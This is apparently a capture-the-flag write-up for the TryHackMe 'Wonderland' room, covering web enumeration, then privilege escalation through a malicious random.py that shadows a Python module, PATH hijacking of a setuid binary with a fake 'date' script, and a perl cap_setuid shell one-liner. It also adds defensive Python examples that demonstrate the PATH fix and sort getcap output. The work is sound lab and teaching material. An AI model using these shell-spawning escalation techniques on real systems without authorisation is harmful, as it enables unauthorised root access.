
Tryhackme

Wonderland

Basic enumeration

Ports

nmap -vv -p- -oN nmap/ports $IP

Open ports:
22,80

sudo nmap -vv -p 22,80 -Pn -A -sV -sC -oN nmap/init $IP

Services:

22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)

Directories

Directory enumeration with gobuster:

gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,cgi,sh,txt,html,py,js,xml,css

results:

/index.html           (Status: 301) [Size: 0] [--> ./]
/img                  (Status: 301) [Size: 0] [--> img/]
/main.css             (Status: 200) [Size: 217]
/r                    (Status: 301) [Size: 0] [--> r/]

"img" is a folder containing further images

Checking out the website itself does not reveal a lot. While inspecting the source code, it can be seen that the image is loaded from the /img endpoint. Maybe there are more pages for the other images.

The page on the /r endpoint tells us to keep going, and inspecting its source code does not lead to anything. Running the same gobuster command as before against http://$IP/r/ gives us a new endpoint, /r/a/.
The website still tells us to keep going. Since the pattern seems to be a single character per level, I decided to go with recursive fuzzing.

Creating a custom wordlist with crunch, that contains lower and upper case letters as well as numbers.

crunch 1 1 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 -o wonderland.txt

Using the wordlist to fuzz the directories recursively:

ffuf -w ./wonderland.txt -u http://10.10.181.25/r/a/FUZZ -mc 200 -recursion -c

That was easy, we found something. To find what you came for, inspect the source code of the page in the last directory found.

<p style='display:none;'>user:password</p>

With those credentials, ssh access is granted!

Checking out the host as the first user

The first two commands worth running for enumeration are:

history
sudo -l

history almost never works in a CTF, but I would consider it good practice anyway ;) In this case the history resides in the abyss:

.bash_history -> /dev/null
sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

A little overview from the home directory:

ls -al /home

drwxr-xr-x  5 alice     alice     4096 Nov  1 21:02 alice
drwxr-x---  3 hatter    hatter    4096 May 25  2020 hatter
drwxr-x---  2 rabbit    rabbit    4096 May 25  2020 rabbit
drwxr-x---  6 tryhackme tryhackme 4096 May 25  2020 tryhackme

Lets check this python script out:

import random
poem = """
# ditched poem lines
"""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

I ditched the poem lines, they are not relevant for this writeup.

User alice may run this script as the user rabbit.
In this case Python library hijacking can be leveraged for privilege escalation by creating our own random.py. When the interpreter runs a script, the first entry of sys.path is the directory containing that script (here /home/alice), and it is searched before PYTHONPATH and before the standard library. alice owns /home/alice, so a random.py dropped there shadows the real module. Note that it is the script's directory that matters, not the current working directory (that is only added for python -c, python -m and the interactive interpreter), and PYTHONPATH would not help anyway since sudo's env_reset strips it.

The hijacking module has to:

  • be named random.py and sit in /home/alice, next to the script
  • have a function "choice" that accepts whatever the script passes to it (one positional argument here)

#!/usr/bin/python3
import os

# *args swallows whatever the script passes in; we never look at it
def choice(*args):
    # rabbit is the one running the interpreter, so this spawns a shell as rabbit
    os.system("/bin/bash -")

The original script is then executed like this:

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Before we delve into the rabbit user: I noticed that the root flag seems to reside in alice's home folder... (we had better remember that later on!)

Checking out the host as the second user

Now...as rabbit...

history
sudo -l

Nope, we do not have rabbit's password (so sudo -l is out) and the history lives in the abyss again. Checking out rabbit's home directory...

-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Apart from the terminal highlighting the binary, the permission bits should scream "privesc, sir?".
The "s" in place of the owner's "x" means the setuid bit is set: whoever runs the binary, the process starts with the effective uid of the file's owner, here root. The second "s", in the group position, is the setgid bit and does the same for the group. So we can execute this binary with the owner's permissions. (As the prompt at the end will show, the shell we get out of it is hatter's rather than root's, so the binary evidently switches user before running its commands; still a step up from rabbit.)

Executing the binary results in the following:

rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Wed, 01 Nov 2023 22:15:29 +0000
Ask very nicely, and I will give you some tea while you wait for him

Segmentation fault (core dumped)

(ctrl+c out)

Since there is nothing on the host to analyze the binary with, we'll go with good old cat (I have left the Klingon from the binary out):

cat teaParty

/bin/echo -n 'Probably by ' && date --date='next hour'

This is great: two commands, one of them called in a bad way... but good for us!

echo is called by absolute path, meaning the full path from / to where the actual binary "echo" sits, while date is not.
When a bare command name is executed, the shell walks the directories in $PATH from left to right and runs the first match it finds. date resides in the same directory as echo:

which date
/bin/date

echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

More hijacking!
Now we'll create our own date script, similar to what we did with python. To have it executed we need to PREPEND the directory containing our script to $PATH; appending would not help, /bin/date would still be found first.

rabbit@wonderland:/home/rabbit$ export PATH="/home/rabbit/:$PATH"
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

Now lets create the script in our home directory

vim date

The content:

#!/bin/bash

echo "HIJACKED!!!!!!"
/bin/bash -

IMPORTANT make it executable

chmod +x date

Lets give it a try:

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by HIJACKED!!!!!!
hatter@wonderland:/home/rabbit$ cat date 

Mad hatter!!
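The same flaw and its fix, as an added example of my own (not the teaParty binary and not from the room): the command string is the one recovered from the binary, run through /bin/sh once with an attacker-controlled PATH and once with a fixed one, and then again with date called by absolute path. The fake date script, the temporary directories and the HIJACKED marker are constructed for the demo; SECURE_PATH is the secure_path value from the sudo -l output above.

```python
#!/usr/bin/env python3
"""PATH hijacking of an unqualified command, and the fix (added example)."""
import os
import stat
import subprocess
import tempfile

# Command recovered from teaParty: 'date' is looked up via PATH, echo is not.
TEA_CMD = "/bin/echo -n 'Probably by ' && date --date='next hour'"

# Fixed variant: same intent, but nothing is left to the caller's PATH.
TEA_CMD_FIXED = "/bin/echo -n 'Probably by ' && /bin/date --date='next hour'"

# What sudo's secure_path on the box sets.  A setuid binary that shells out
# should impose something like this itself instead of inheriting PATH.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Stands in for the shell-spawning 'date' from the writeup.
FAKE_DATE = "#!/bin/sh\necho HIJACKED\n"


def run_tea(cmd: str, path: str) -> str:
    """Run cmd the way system() would, via /bin/sh, with PATH set to path."""
    proc = subprocess.run(["/bin/sh", "-c", cmd], env={"PATH": path},
                          capture_output=True, text=True)
    return proc.stdout


def demo(cmd: str, trust_caller_path: bool) -> bool:
    """Return True if the attacker's fake date ended up being executed.

    trust_caller_path=True reproduces teaParty (PATH inherited from the
    caller, who has prepended their own directory); False is the hardened
    behaviour of resetting PATH before shelling out.
    """
    with tempfile.TemporaryDirectory() as attacker_dir:
        fake = os.path.join(attacker_dir, "date")
        with open(fake, "w", encoding="utf-8") as fh:
            fh.write(FAKE_DATE)
        os.chmod(fake, stat.S_IRWXU)          # the chmod +x step
        caller_path = attacker_dir + ":" + SECURE_PATH   # export PATH="/home/rabbit/:$PATH"
        path = caller_path if trust_caller_path else SECURE_PATH
        return "HIJACKED" in run_tea(cmd, path)


if __name__ == "__main__":
    print("teaParty, attacker PATH      :", demo(TEA_CMD, True))
    print("teaParty, PATH reset         :", demo(TEA_CMD, False))
    print("absolute /bin/date, any PATH :", demo(TEA_CMD_FIXED, True))
```

Only the first case succeeds. Either fix on its own (absolute paths everywhere, or a hard-coded PATH before calling system()) closes the hole; the more robust answer is for a setuid program not to go through a shell at all and to exec the binary it wants by full path.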

Exploring the machine as the third user

By mistyping an ls command I noticed something...

ls -al /
drwx--x--x   4 root root       4096 May 25  2020 root

We have eXecute (search) permission on /root but no read permission: we cannot list the directory, but we can open a file inside it if we know its name...

cat /root/user.txt

Well, that explains the root.txt in ~: the two flags have simply been swapped.

For hatter, again no history and we are not allowed to run sudo...
But there is a password.txt in hatter's home directory, which contains his password.
At least we can now ssh into the machine as hatter and get a proper login shell.

Before using linpeas we can look for files with capabilities:

getcap -r / 2>/dev/null

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

2>/dev/null throws all the errors into the abyss (next to the bash history :) )

perl has cap_setuid with the flags +ep: e is the effective set, p the permitted set. Permitted is what the process is allowed to use, effective is what is in force right now, so with +ep the capability is active the moment perl starts, and a perl script can simply call setuid(0) to become root.

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

(from perl | GTFOBins, a great resource for privilege escalation!)
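Reading getcap output by eye works for three lines; on a real host it can be hundreds. Here is an added example of my own (not from the writeup) that parses getcap -r output and flags the capabilities that hand over root outright. SAMPLE_GETCAP is constructed from the three lines above; the DANGEROUS table is my own shortlist of the capabilities GTFOBins has entries for, and the parser accepts both the older "path = caps+ep" layout seen on the box and the newer "path caps=ep" layout of recent libcap.

```python
#!/usr/bin/env python3
"""Triage getcap -r output for capabilities that give direct privesc (added example)."""
import re
from typing import List, Tuple

# Constructed from the writeup's getcap output.
SAMPLE_GETCAP = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
"""

# Capabilities that, on an interpreter or general-purpose binary, are
# enough to become root or to read/write any file.  My own shortlist.
DANGEROUS = {
    "cap_setuid": "setuid(0) then exec a shell",
    "cap_setgid": "change gid (shadow group and the like)",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow or root's keys",
    "cap_dac_override": "read/write any file, e.g. append to /etc/passwd",
    "cap_sys_admin": "mount, namespaces, effectively root",
    "cap_sys_ptrace": "inject into processes running as root",
    "cap_sys_module": "load a kernel module",
    "cap_chown": "take ownership of arbitrary files",
    "cap_fowner": "chmod files owned by others",
}

# One clause of libcap's text format: names, operator, flag letters,
# e.g. "cap_setuid+ep" or "cap_net_raw,cap_net_admin=eip".
CLAUSE_RE = re.compile(r"^(?P<names>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")


def parse_getcap(text: str) -> List[Tuple[str, str, str]]:
    """Parse getcap output into (path, capability, flags) triples.

    Accepts 'path = caps+ep' (older libcap) and 'path caps=ep' (libcap
    2.41 and later); lines that do not parse are skipped.
    """
    out = []
    for raw in text.splitlines():
        tokens = raw.split()
        if len(tokens) < 2:
            continue
        path = tokens[0]
        for clause in tokens[1:]:
            if clause == "=":          # separator of the older layout
                continue
            m = CLAUSE_RE.match(clause)
            if not m:
                continue
            for name in m.group("names").split(","):
                out.append((path, name, m.group("flags")))
    return out


def triage(text: str) -> List[Tuple[str, str, str]]:
    """Return (path, capability, why) for every permitted dangerous cap."""
    hits = []
    for path, name, flags in parse_getcap(text):
        if name not in DANGEROUS or "p" not in flags:
            continue
        why = DANGEROUS[name]
        if "e" not in flags:
            why += " (permitted only: the program has to raise it itself)"
        hits.append((path, name, why))
    return hits


if __name__ == "__main__":
    for path, name, why in triage(SAMPLE_GETCAP):
        print(f"{path}: {name} -> {why}")
```

On the sample input only the two perl binaries are reported; mtr-packet's cap_net_raw is noisy but not a route to root by itself. A capability that is permitted but not effective still gets listed, with a note, because a binary that can raise it (or a script interpreter with a capability-aware module) is just as exploitable.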

cat /home/alice/root.txt

Congrats!